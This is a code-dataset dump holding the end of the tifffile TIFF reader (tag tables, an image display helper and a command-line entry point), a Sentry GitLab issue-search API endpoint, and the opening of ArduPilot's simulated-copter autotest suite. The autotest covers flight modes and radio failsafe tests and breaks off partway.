33451: ('md_prep_time', None, 2, None, None),
33452: ('md_file_units', None, 2, None, None),
33550: ('model_pixel_scale', None, 12, 3, None),
33922: ('model_tie_point', None, 12, None, None),
34665: ('exif_ifd', None, None, 1, None),
34735: ('geo_key_directory', None, 3, None, None),
34736: ('geo_double_params', None, 12, None, None),
34737: ('geo_ascii_params', None, 2, None, None),
34853: ('gps_ifd', None, None, 1, None),
37510: ('user_comment', None, None, None, None),
42112: ('gdal_metadata', None, 2, None, None),
42113: ('gdal_nodata', None, 2, None, None),
50289: ('mc_xy_position', None, 12, 2, None),
50290: ('mc_z_position', None, 12, 1, None),
50291: ('mc_xy_calibration', None, 12, 3, None),
50292: ('mc_lens_lem_na_n', None, 12, 3, None),
50293: ('mc_channel_name', None, 1, None, None),
50294: ('mc_ex_wavelength', None, 12, 1, None),
50295: ('mc_time_stamp', None, 12, 1, None),
50838: ('imagej_byte_counts', None, None, None, None),
65200: ('flex_xml', None, 2, None, None),
# code: (attribute name, default value, type, count, validator)
}
# Map custom TIFF tag codes to attribute names and import functions
CUSTOM_TAGS = {
700: ('xmp', read_bytes),
34377: ('photoshop', read_numpy),
33723: ('iptc', read_bytes),
34675: ('icc_profile', read_bytes),
33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK
33629: ('uic2tag', read_uic2tag),
33630: ('uic3tag', read_uic3tag),
33631: ('uic4tag', read_uic4tag),
34361: ('mm_header', read_mm_header), # Olympus FluoView
34362: ('mm_stamp', read_mm_stamp),
34386: ('mm_user_block', read_bytes),
34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM
43314: ('nih_image_header', read_nih_image_header),
# 40001: ('mc_ipwinscal', read_bytes),
40100: ('mc_id_old', read_bytes),
50288: ('mc_id', read_bytes),
50296: ('mc_frame_properties', read_bytes),
50839: ('imagej_metadata', read_bytes),
51123: ('micromanager_metadata', read_json),
}
# Max line length of printed output
PRINT_LINE_LEN = 79
def imshow(data, title=None, vmin=0, vmax=None, cmap=None,
bitspersample=None, photometric='rgb', interpolation='nearest',
dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs):
"""Plot n-dimensional images using matplotlib.pyplot.
Return figure, subplot and plot axis.
Requires pyplot already imported ``from matplotlib import pyplot``.
Parameters
----------
bitspersample : int or None
Number of bits per channel in integer RGB images.
photometric : {'miniswhite', 'minisblack', 'rgb', or 'palette'}
The color space of the image data.
title : str
Window and subplot title.
figure : matplotlib.figure.Figure (optional).
Matplotlib to use for plotting.
subplot : int
A matplotlib.pyplot.subplot axis.
maxdim : int
maximum image size in any dimension.
kwargs : optional
Arguments for matplotlib.pyplot.imshow.
"""
#if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'):
# raise ValueError("Can't handle %s photometrics" % photometric)
# TODO: handle photometric == 'separated' (CMYK)
isrgb = photometric in ('rgb', 'palette')
data = numpy.atleast_2d(data.squeeze())
data = data[(slice(0, maxdim), ) * len(data.shape)]
dims = data.ndim
if dims < 2:
raise ValueError("not an image")
elif dims == 2:
dims = 0
isrgb = False
else:
if isrgb and data.shape[-3] in (3, 4):
data = numpy.swapaxes(data, -3, -2)
data = numpy.swapaxes(data, -2, -1)
elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and
data.shape[-1] < data.shape[-3] // 16 and
data.shape[-1] < 5):
data = numpy.swapaxes(data, -3, -1)
data = numpy.swapaxes(data, -2, -1)
isrgb = isrgb and data.shape[-1] in (3, 4)
dims -= 3 if isrgb else 2
if photometric == 'palette' and isrgb:
datamax = data.max()
if datamax > 255:
data >>= 8 # possible precision loss
data = data.astype('B')
elif data.dtype.kind in 'ui':
if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None:
try:
bitspersample = int(math.ceil(math.log(data.max(), 2)))
except Exception:
bitspersample = data.dtype.itemsize * 8
elif not isinstance(bitspersample, int):
# bitspersample can be tuple, e.g. (5, 6, 5)
bitspersample = data.dtype.itemsize * 8
datamax = 2**bitspersample
if isrgb:
if bitspersample < 8:
data <<= 8 - bitspersample
elif bitspersample > 8:
data >>= bitspersample - 8 # precision loss
data = data.astype('B')
elif data.dtype.kind == 'f':
datamax = data.max()
if isrgb and datamax > 1.0:
if data.dtype.char == 'd':
data = data.astype('f')
data /= datamax
elif data.dtype.kind == 'b':
datamax = 1
elif data.dtype.kind == 'c':
raise NotImplementedError("complex type") # TODO: handle complex types
if not isrgb:
if vmax is None:
vmax = datamax
if vmin is None:
if data.dtype.kind == 'i':
dtmin = numpy.iinfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
vmin = numpy.min(data > dtmin)
if data.dtype.kind == 'f':
dtmin = numpy.finfo(data.dtype).min
vmin = numpy.min(data)
if vmin == dtmin:
vmin = numpy.min(data > dtmin)
else:
vmin = 0
pyplot = sys.modules['matplotlib.pyplot']
if figure is None:
pyplot.rc('font', family='sans-serif', weight='normal', size=8)
figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True,
facecolor='1.0', edgecolor='w')
try:
figure.canvas.manager.window.title(title)
except Exception:
pass
pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9,
left=0.1, right=0.95, hspace=0.05, wspace=0.0)
subplot = pyplot.subplot(subplot)
if title:
try:
title = unicode(title, 'Windows-1252')
except TypeError:
pass
pyplot.title(title, size=11)
if cmap is None:
if data.dtype.kind in 'ubf' or vmin == 0:
cmap = 'cubehelix'
else:
cmap = 'coolwarm'
if photometric == 'miniswhite':
cmap += '_r'
image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax,
cmap=cmap, interpolation=interpolation, **kwargs)
if not isrgb:
pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05
def format_coord(x, y):
# callback function to format coordinate display in toolbar
x = int(x + 0.5)
y = int(y + 0.5)
try:
if dims:
return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x],
current, x, y)
else:
return "%s @ [%4i, %4i]" % (data[y, x], x, y)
except IndexError:
return ""
pyplot.gca().format_coord = format_coord
if dims:
current = list((0, ) * dims)
cur_ax_dat = [0, data[tuple(current)].squeeze()]
sliders = [pyplot.Slider(
pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]),
'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5',
valfmt='%%.0f [%i]' % data.shape[axis]) for axis in range(dims)]
for slider in sliders:
slider.drawon = False
def set_image(current, sliders=sliders, data=data):
# change image and redraw canvas
cur_ax_dat[1] = data[tuple(current)].squeeze()
image.set_data(cur_ax_dat[1])
for ctrl, index in zip(sliders, current):
ctrl.eventson = False
ctrl.set_val(index)
ctrl.eventson = True
figure.canvas.draw()
def on_changed(index, axis, data=data, current=current):
# callback function for slider change event
index = int(round(index))
cur_ax_dat[0] = axis
if index == current[axis]:
return
if index >= data.shape[axis]:
index = 0
elif index < 0:
index = data.shape[axis] - 1
current[axis] = index
set_image(current)
def on_keypressed(event, data=data, current=current):
# callback function for key press event
key = event.key
axis = cur_ax_dat[0]
if str(key) in '0123456789':
on_changed(key, axis)
elif key == 'right':
on_changed(current[axis] + 1, axis)
elif key == 'left':
on_changed(current[axis] - 1, axis)
elif key == 'up':
cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1
elif key == 'down':
cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1
elif key == 'end':
on_changed(data.shape[axis] - 1, axis)
elif key == 'home':
on_changed(0, axis)
figure.canvas.mpl_connect('key_press_event', on_keypressed)
for axis, ctrl in enumerate(sliders):
ctrl.on_changed(lambda k, a=axis: on_changed(k, a))
return figure, subplot, image
def _app_show():
"""Block the GUI. For use as skimage plugin."""
pyplot = sys.modules['matplotlib.pyplot']
pyplot.show()
def main(argv=None):
"""Command line usage main function."""
if float(sys.version[0:3]) < 2.6:
print("This script requires Python version 2.6 or better.")
print("This is Python version %s" % sys.version)
return 0
if argv is None:
argv = sys.argv
import optparse
parser = optparse.OptionParser(
usage="usage: %prog [options] path",
description="Display image data in TIFF files.",
version="%%prog %s" % __version__)
opt = parser.add_option
opt('-p', '--page', dest='page', type='int', default=-1,
help="display single page")
opt('-s', '--series', dest='series', type='int', default=-1,
help="display series of pages of same shape")
opt('--nomultifile', dest='nomultifile', action='store_true',
default=False, help="don't read OME series from multiple files")
opt('--noplot', dest='noplot', action='store_true', default=False,
help="don't display images")
opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear',
help="image interpolation method")
opt('--dpi', dest='dpi', type='int', default=96,
help="set plot resolution")
opt('--debug', dest='debug', action='store_true', default=False,
help="raise exception on failures")
opt('--test', dest='test', action='store_true', default=False,
help="try read all images in path")
opt('--doctest', dest='doctest', action='store_true', default=False,
help="runs the docstring examples")
opt('-v', '--verbose', dest='verbose', action='store_true', default=True)
opt('-q', '--quiet', dest='verbose', action='store_false')
settings, path = parser.parse_args()
path = ' '.join(path)
if settings.doctest:
import doctest
doctest.testmod()
return 0
if not path:
parser.error("No file specified")
if settings.test:
test_tifffile(path, settings.verbose)
return 0
if any(i in path for i in '?*'):
path = glob.glob(path)
if not path:
print('no files match the pattern')
return 0
# TODO: handle image sequences
#if len(path) == 1:
path = path[0]
print("Reading file structure...", end=' ')
start = time.time()
try:
tif = TiffFile(path, multifile=not settings.nomultifile)
except Exception as e:
if settings.debug:
raise
else:
print("\n", e)
sys.exit(0)
print("%.3f ms" % ((time.time()-start) * 1e3))
if tif.is_ome:
settings.norgb = True
images = [(None, tif[0 if settings.page < 0 else settings.page])]
if not settings.noplot:
print("Reading image data... ", end=' ')
def notnone(x):
return next(i for i in x if i is not None)
start = time.time()
try:
if settings.page >= 0:
images = [(tif.asarray(key=settings.page),
tif[settings.page])]
elif settings.series >= 0:
images = [(tif.asarray(series=settings.series),
notnone(tif.series[settings.series].pages))]
else:
images = []
for i, s in enumerate(tif.series):
try:
images.append(
(tif.asarray(series=i), notnone(s.pages)))
except ValueError as e:
images.append((None, notnone(s.pages)))
if settings.debug:
raise
else:
print("\n* series %i failed: %s... " % (i, e),
end='')
print("%.3f ms" % ((time.time()-start) * 1e3))
except Exception as e:
if settings.debug:
raise
else:
print(e)
tif.close()
print("\nTIFF file:", tif)
print()
for i, s in enumerate(tif.series):
print ("Series %i" % i)
print(s)
print()
for i, page in images:
print(page)
print(page.tags)
if page.is_palette:
print("\nColor Map:", page.color_map.shape, page.color_map.dtype)
for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags',
'mm_header', 'imagej_tags', 'micromanager_metadata',
'nih_image_header'):
if hasattr(page, attr):
print("", attr.upper(), Record(getattr(page, attr)), sep="\n")
print()
if page.is_micromanager:
print('MICROMANAGER_FILE_METADATA')
print(Record(tif.micromanager_metadata))
if images and not settings.noplot:
try:
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot
except ImportError as e:
warnings.warn("failed to import matplotlib.\n%s" % e)
else:
for img, page in images:
if img is None:
continue
vmin, vmax = None, None
if 'gdal_nodata' in page.tags:
try:
vmin = numpy.min(img[img > float(page.gdal_nodata)])
except ValueError:
pass
if page.is_stk:
try:
vmin = page.uic_tags['min_scale']
vmax = page.uic_tags['max_scale']
except KeyError:
pass
else:
if vmax <= vmin:
vmin, vmax = None, None
title = "%s\n %s" % (str(tif), str(page))
imshow(img, title=title, vmin=vmin, vmax=vmax,
bitspersample=page.bits_per_sample,
photometric=page.photometric,
interpolation=settings.interpol,
dpi=settings.dpi)
pyplot.show()
TIFFfile = TiffFile # backwards compatibility
if sys.version_info[0] > 2:
basestring = str, bytes
unicode = str
if __name__ == "__main__":
sys.exit(main())
| bsd-3-clause | 771,240,095,069,591,600 | 34.651316 | 79 | 0.537928 | false |
mvaled/sentry | src/sentry/integrations/gitlab/search.py | 2 | 2359 | from __future__ import absolute_import
import six
from rest_framework.response import Response
from sentry.api.bases.integration import IntegrationEndpoint
from sentry.integrations.exceptions import ApiError
from sentry.models import Integration
class GitlabIssueSearchEndpoint(IntegrationEndpoint):
def get(self, request, organization, integration_id):
try:
integration = Integration.objects.get(
organizations=organization, id=integration_id, provider="gitlab"
)
except Integration.DoesNotExist:
return Response(status=404)
field = request.GET.get("field")
query = request.GET.get("query")
if field is None:
return Response({"detail": "field is a required parameter"}, status=400)
if query is None:
return Response({"detail": "query is a required parameter"}, status=400)
installation = integration.get_installation(organization.id)
if field == "externalIssue":
project = request.GET.get("project")
if project is None:
return Response({"detail": "project is a required parameter"}, status=400)
try:
iids = [int(query)]
query = None
except ValueError:
iids = None
try:
response = installation.search_issues(query=query, project_id=project, iids=iids)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{
"label": "(#%s) %s" % (i["iid"], i["title"]),
"value": "%s#%s" % (i["project_id"], i["iid"]),
}
for i in response
]
)
elif field == "project":
try:
response = installation.search_projects(query)
except ApiError as e:
return Response({"detail": six.text_type(e)}, status=400)
return Response(
[
{"label": project["name_with_namespace"], "value": project["id"]}
for project in response
]
)
return Response({"detail": "invalid field value"}, status=400)
| bsd-3-clause | 6,474,268,268,709,563,000 | 34.742424 | 97 | 0.539635 | false |
samuelctabor/ardupilot | Tools/autotest/arducopter.py | 1 | 288681 | #!/usr/bin/env python
'''
Fly Copter in SITL
AP_FLAKE8_CLEAN
'''
from __future__ import print_function
import copy
import math
import os
import shutil
import time
import numpy
from pymavlink import mavutil
from pymavlink import mavextra
from pymavlink import rotmat
from pysim import util
from pysim import vehicleinfo
from common import AutoTest
from common import NotAchievedException, AutoTestTimeoutException, PreconditionFailedException
from common import Test
from pymavlink.rotmat import Vector3
# get location of scripts
testdir = os.path.dirname(os.path.realpath(__file__))
SITL_START_LOCATION = mavutil.location(-35.362938, 149.165085, 584, 270)
SITL_START_LOCATION_AVC = mavutil.location(40.072842, -105.230575, 1586, 0)
# Flight mode switch positions are set-up in arducopter.param to be
# switch 1 = Circle
# switch 2 = Land
# switch 3 = RTL
# switch 4 = Auto
# switch 5 = Loiter
# switch 6 = Stabilize
class AutoTestCopter(AutoTest):
@staticmethod
def get_not_armable_mode_list():
return ["AUTO", "AUTOTUNE", "BRAKE", "CIRCLE", "FLIP", "LAND", "RTL", "SMART_RTL", "AVOID_ADSB", "FOLLOW"]
@staticmethod
def get_not_disarmed_settable_modes_list():
return ["FLIP", "AUTOTUNE"]
@staticmethod
def get_no_position_not_settable_modes_list():
return []
@staticmethod
def get_position_armable_modes_list():
return ["DRIFT", "GUIDED", "LOITER", "POSHOLD", "THROW"]
@staticmethod
def get_normal_armable_modes_list():
return ["ACRO", "ALT_HOLD", "SPORT", "STABILIZE", "GUIDED_NOGPS"]
def log_name(self):
return "ArduCopter"
def test_filepath(self):
return os.path.realpath(__file__)
def set_current_test_name(self, name):
self.current_test_name_directory = "ArduCopter_Tests/" + name + "/"
def sitl_start_location(self):
return SITL_START_LOCATION
def mavproxy_options(self):
ret = super(AutoTestCopter, self).mavproxy_options()
if self.frame != 'heli':
ret.append('--quadcopter')
return ret
def sitl_streamrate(self):
return 5
def vehicleinfo_key(self):
return 'ArduCopter'
def default_frame(self):
return "+"
def apply_defaultfile_parameters(self):
# Copter passes in a defaults_filepath in place of applying
# parameters afterwards.
pass
def defaults_filepath(self):
return self.model_defaults_filepath(self.vehicleinfo_key(), self.frame)
def wait_disarmed_default_wait_time(self):
return 120
def close(self):
super(AutoTestCopter, self).close()
# [2014/05/07] FC Because I'm doing a cross machine build
# (source is on host, build is on guest VM) I cannot hard link
# This flag tells me that I need to copy the data out
if self.copy_tlog:
shutil.copy(self.logfile, self.buildlog)
def is_copter(self):
return True
def get_stick_arming_channel(self):
return int(self.get_parameter("RCMAP_YAW"))
def get_disarm_delay(self):
return int(self.get_parameter("DISARM_DELAY"))
def set_autodisarm_delay(self, delay):
self.set_parameter("DISARM_DELAY", delay)
def user_takeoff(self, alt_min=30):
'''takeoff using mavlink takeoff command'''
self.run_cmd(mavutil.mavlink.MAV_CMD_NAV_TAKEOFF,
0, # param1
0, # param2
0, # param3
0, # param4
0, # param5
0, # param6
alt_min # param7
)
self.progress("Ran command")
self.wait_for_alt(alt_min)
def takeoff(self,
alt_min=30,
takeoff_throttle=1700,
require_absolute=True,
mode="STABILIZE",
timeout=120):
"""Takeoff get to 30m altitude."""
self.progress("TAKEOFF")
self.change_mode(mode)
if not self.armed():
self.wait_ready_to_arm(require_absolute=require_absolute, timeout=timeout)
self.zero_throttle()
self.arm_vehicle()
if mode == 'GUIDED':
self.user_takeoff(alt_min=alt_min)
else:
self.set_rc(3, takeoff_throttle)
self.wait_for_alt(alt_min=alt_min, timeout=timeout)
self.hover()
self.progress("TAKEOFF COMPLETE")
def wait_for_alt(self, alt_min=30, timeout=30, max_err=5):
"""Wait for minimum altitude to be reached."""
self.wait_altitude(alt_min - 1,
(alt_min + max_err),
relative=True,
timeout=timeout)
def land_and_disarm(self, timeout=60):
"""Land the quad."""
self.progress("STARTING LANDING")
self.change_mode("LAND")
self.wait_landed_and_disarmed(timeout=timeout)
def wait_landed_and_disarmed(self, min_alt=6, timeout=60):
"""Wait to be landed and disarmed"""
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
if alt > min_alt:
self.wait_for_alt(min_alt, timeout=timeout)
# self.wait_statustext("SIM Hit ground", timeout=timeout)
self.wait_disarmed()
def hover(self, hover_throttle=1500):
self.set_rc(3, hover_throttle)
# Climb/descend to a given altitude
def setAlt(self, desiredAlt=50):
pos = self.mav.location(relative_alt=True)
if pos.alt > desiredAlt:
self.set_rc(3, 1300)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
if pos.alt < (desiredAlt-5):
self.set_rc(3, 1800)
self.wait_altitude((desiredAlt-5), desiredAlt, relative=True)
self.hover()
# Takeoff, climb to given altitude, and fly east for 10 seconds
def takeoffAndMoveAway(self, dAlt=50, dDist=50):
self.progress("Centering sticks")
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1000,
4: 1500,
})
self.takeoff(alt_min=dAlt)
self.change_mode("ALT_HOLD")
self.progress("Yaw to east")
self.set_rc(4, 1580)
self.wait_heading(90)
self.set_rc(4, 1500)
self.progress("Fly eastbound away from home")
self.set_rc(2, 1800)
self.delay_sim_time(10)
self.set_rc(2, 1500)
self.hover()
self.progress("Copter staging 50 meters east of home at 50 meters altitude In mode Alt Hold")
# loiter - fly south west, then loiter within 5m position and altitude
def loiter(self, holdtime=10, maxaltchange=5, maxdistchange=5):
"""Hold loiter position."""
self.takeoff(10, mode="LOITER")
# first aim south east
self.progress("turn south east")
self.set_rc(4, 1580)
self.wait_heading(170)
self.set_rc(4, 1500)
# fly south east 50m
self.set_rc(2, 1100)
self.wait_distance(50)
self.set_rc(2, 1500)
# wait for copter to slow moving
self.wait_groundspeed(0, 2)
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
start_altitude = m.alt
start = self.mav.location()
tstart = self.get_sim_time()
self.progress("Holding loiter at %u meters for %u seconds" %
(start_altitude, holdtime))
while self.get_sim_time_cached() < tstart + holdtime:
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
pos = self.mav.location()
delta = self.get_distance(start, pos)
alt_delta = math.fabs(m.alt - start_altitude)
self.progress("Loiter Dist: %.2fm, alt:%u" % (delta, m.alt))
if alt_delta > maxaltchange:
raise NotAchievedException(
"Loiter alt shifted %u meters (> limit %u)" %
(alt_delta, maxaltchange))
if delta > maxdistchange:
raise NotAchievedException(
"Loiter shifted %u meters (> limit of %u)" %
(delta, maxdistchange))
self.progress("Loiter OK for %u seconds" % holdtime)
self.progress("Climb to 30m")
self.change_alt(30)
self.progress("Descend to 20m")
self.change_alt(20)
self.do_RTL()
def watch_altitude_maintained(self, min_alt, max_alt, timeout=10):
'''watch alt, relative alt must remain between min_alt and max_alt'''
tstart = self.get_sim_time_cached()
while True:
if self.get_sim_time_cached() - tstart > timeout:
return
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
if m.alt <= min_alt:
raise NotAchievedException("Altitude not maintained: want >%f got=%f" % (min_alt, m.alt))
def test_mode_ALT_HOLD(self):
self.takeoff(10, mode="ALT_HOLD")
self.watch_altitude_maintained(9, 11, timeout=5)
# feed in full elevator and aileron input and make sure we
# retain altitude:
self.set_rc_from_map({
1: 1000,
2: 1000,
})
self.watch_altitude_maintained(9, 11, timeout=5)
self.set_rc_from_map({
1: 1500,
2: 1500,
})
self.do_RTL()
def fly_to_origin(self, final_alt=10):
origin = self.poll_message("GPS_GLOBAL_ORIGIN")
self.change_mode("GUIDED")
self.guided_move_global_relative_alt(origin.latitude,
origin.longitude,
final_alt)
def change_alt(self, alt_min, climb_throttle=1920, descend_throttle=1080):
"""Change altitude."""
def adjust_altitude(current_alt, target_alt, accuracy):
if math.fabs(current_alt - target_alt) <= accuracy:
self.hover()
elif current_alt < target_alt:
self.set_rc(3, climb_throttle)
else:
self.set_rc(3, descend_throttle)
self.wait_altitude(
(alt_min - 5),
alt_min,
relative=True,
called_function=lambda current_alt, target_alt: adjust_altitude(current_alt, target_alt, 1)
)
self.hover()
def setGCSfailsafe(self, paramValue=0):
# Slow down the sim rate if GCS Failsafe is in use
if paramValue == 0:
self.set_parameter("FS_GCS_ENABLE", paramValue)
self.set_parameter("SIM_SPEEDUP", 10)
else:
self.set_parameter("SIM_SPEEDUP", 4)
self.set_parameter("FS_GCS_ENABLE", paramValue)
# fly a square in alt_hold mode
def fly_square(self, side=50, timeout=300):
self.takeoff(20, mode="ALT_HOLD")
"""Fly a square, flying N then E ."""
tstart = self.get_sim_time()
# ensure all sticks in the middle
self.set_rc_from_map({
1: 1500,
2: 1500,
3: 1500,
4: 1500,
})
# switch to loiter mode temporarily to stop us from rising
self.change_mode('LOITER')
# first aim north
self.progress("turn right towards north")
self.set_rc(4, 1580)
self.wait_heading(10)
self.set_rc(4, 1500)
# save bottom left corner of box as waypoint
self.progress("Save WP 1 & 2")
self.save_wp()
# switch back to ALT_HOLD mode
self.change_mode('ALT_HOLD')
# pitch forward to fly north
self.progress("Going north %u meters" % side)
self.set_rc(2, 1300)
self.wait_distance(side)
self.set_rc(2, 1500)
# save top left corner of square as waypoint
self.progress("Save WP 3")
self.save_wp()
# roll right to fly east
self.progress("Going east %u meters" % side)
self.set_rc(1, 1700)
self.wait_distance(side)
self.set_rc(1, 1500)
# save top right corner of square as waypoint
self.progress("Save WP 4")
self.save_wp()
# pitch back to fly south
self.progress("Going south %u meters" % side)
self.set_rc(2, 1700)
self.wait_distance(side)
self.set_rc(2, 1500)
# save bottom right corner of square as waypoint
self.progress("Save WP 5")
self.save_wp()
# roll left to fly west
self.progress("Going west %u meters" % side)
self.set_rc(1, 1300)
self.wait_distance(side)
self.set_rc(1, 1500)
# save bottom left corner of square (should be near home) as waypoint
self.progress("Save WP 6")
self.save_wp()
# reduce throttle again
self.set_rc(3, 1500)
# descend to 10m
self.progress("Descend to 10m in Loiter")
self.change_mode('LOITER')
self.set_rc(3, 1200)
time_left = timeout - (self.get_sim_time() - tstart)
self.progress("timeleft = %u" % time_left)
if time_left < 20:
time_left = 20
self.wait_altitude(-10, 10, timeout=time_left, relative=True)
self.set_rc(3, 1500)
self.save_wp()
# save the stored mission to file
mavproxy = self.start_mavproxy()
num_wp = self.save_mission_to_file_using_mavproxy(
mavproxy,
os.path.join(testdir, "ch7_mission.txt"))
self.stop_mavproxy(mavproxy)
if not num_wp:
self.fail_list.append("save_mission_to_file")
self.progress("save_mission_to_file failed")
self.progress("test: Fly a mission from 1 to %u" % num_wp)
self.change_mode('AUTO')
self.set_current_waypoint(1)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.progress("test: MISSION COMPLETE: passed!")
self.land_and_disarm()
# enter RTL mode and wait for the vehicle to disarm
def do_RTL(self, distance_min=None, check_alt=True, distance_max=10, timeout=250):
"""Enter RTL mode and wait for the vehicle to disarm at Home."""
self.change_mode("RTL")
self.hover()
self.wait_rtl_complete(check_alt=check_alt, distance_max=distance_max, timeout=timeout)
def wait_rtl_complete(self, check_alt=True, distance_max=10, timeout=250):
"""Wait for RTL to reach home and disarm"""
self.progress("Waiting RTL to reach Home and disarm")
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + timeout:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
alt = m.relative_alt / 1000.0 # mm -> m
home_distance = self.distance_to_home(use_cached_home=True)
home = ""
alt_valid = alt <= 1
distance_valid = home_distance < distance_max
if check_alt:
if alt_valid and distance_valid:
home = "HOME"
else:
if distance_valid:
home = "HOME"
self.progress("Alt: %.02f HomeDist: %.02f %s" %
(alt, home_distance, home))
# our post-condition is that we are disarmed:
if not self.armed():
if home == "":
raise NotAchievedException("Did not get home")
# success!
return
raise AutoTestTimeoutException("Did not get home and disarm")
def fly_loiter_to_alt(self):
"""loiter to alt"""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
num_wp = self.load_mission("copter_loiter_to_alt.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1550)
self.wait_current_waypoint(2)
self.set_rc(3, 1500)
self.wait_waypoint(0, num_wp-1, timeout=500)
self.wait_disarmed()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
# Tests all actions and logic behind the radio failsafe
def fly_throttle_failsafe(self, side=60, timeout=360):
self.start_subtest("If you haven't taken off yet RC failure should be instant disarm")
self.change_mode("STABILIZE")
self.set_parameter("DISARM_DELAY", 0)
self.arm_vehicle()
self.set_parameter("SIM_RC_FAIL", 1)
self.disarm_wait(timeout=1)
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter("DISARM_DELAY", 10)
# Trigger an RC failure with the failsafe disabled. Verify no action taken.
self.start_subtest("Radio failsafe disabled test: FS_THR_ENABLE=0 should take no failsafe action")
self.set_parameter('FS_THR_ENABLE', 0)
self.set_parameter('FS_OPTIONS', 0)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.wait_mode("ALT_HOLD")
self.end_subtest("Completed Radio failsafe disabled test")
# Trigger an RC failure, verify radio failsafe triggers,
# restore radio, verify RC function by changing modes to cicle
# and stabilize.
self.start_subtest("Radio failsafe recovery test")
self.set_parameter('FS_THR_ENABLE', 1)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 0)
self.delay_sim_time(5)
self.set_rc(5, 1050)
self.wait_mode("CIRCLE")
self.set_rc(5, 1950)
self.wait_mode("STABILIZE")
self.end_subtest("Completed Radio failsafe recovery test")
# Trigger and RC failure, verify failsafe triggers and RTL completes
self.start_subtest("Radio failsafe RTL with no options test: FS_THR_ENABLE=1 & FS_OPTIONS=0")
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("RTL")
self.wait_rtl_complete()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe RTL with no options test")
# Trigger and RC failure, verify failsafe triggers and land completes
self.start_subtest("Radio failsafe LAND with no options test: FS_THR_ENABLE=3 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 3)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe LAND with no options test")
# Trigger and RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->RTL with no options test: FS_THR_ENABLE=4 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL->RTL with no options test")
# Trigger and RC failure, verify failsafe triggers and SmartRTL completes
self.start_subtest("Radio failsafe SmartRTL->Land with no options test: FS_THR_ENABLE=5 & FS_OPTIONS=0")
self.set_parameter('FS_THR_ENABLE', 5)
self.takeoffAndMoveAway()
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("SMART_RTL")
self.wait_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.end_subtest("Completed Radio failsafe SmartRTL_Land with no options test")
# Trigger a GPS failure and RC failure, verify RTL fails into
# land mode and completes
self.start_subtest("Radio failsafe RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 1)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
self.wait_ekf_happy()
self.end_subtest("Completed Radio failsafe RTL fails into land mode due to bad position.")
# Trigger a GPS failure and RC failure, verify SmartRTL fails
# into land mode and completes
self.start_subtest("Radio failsafe SmartRTL->RTL fails into land mode due to bad position.")
self.set_parameter('FS_THR_ENABLE', 4)
self.takeoffAndMoveAway()
self.set_parameter('SIM_GPS_DISABLE', 1)
self.delay_sim_time(5)
self.set_parameter("SIM_RC_FAIL", 1)
self.wait_mode("LAND")
self.wait_landed_and_disarmed()
self.set_parameter("SIM_RC_FAIL", 0)
self.set_parameter('SIM_GPS_DISABLE', 0)
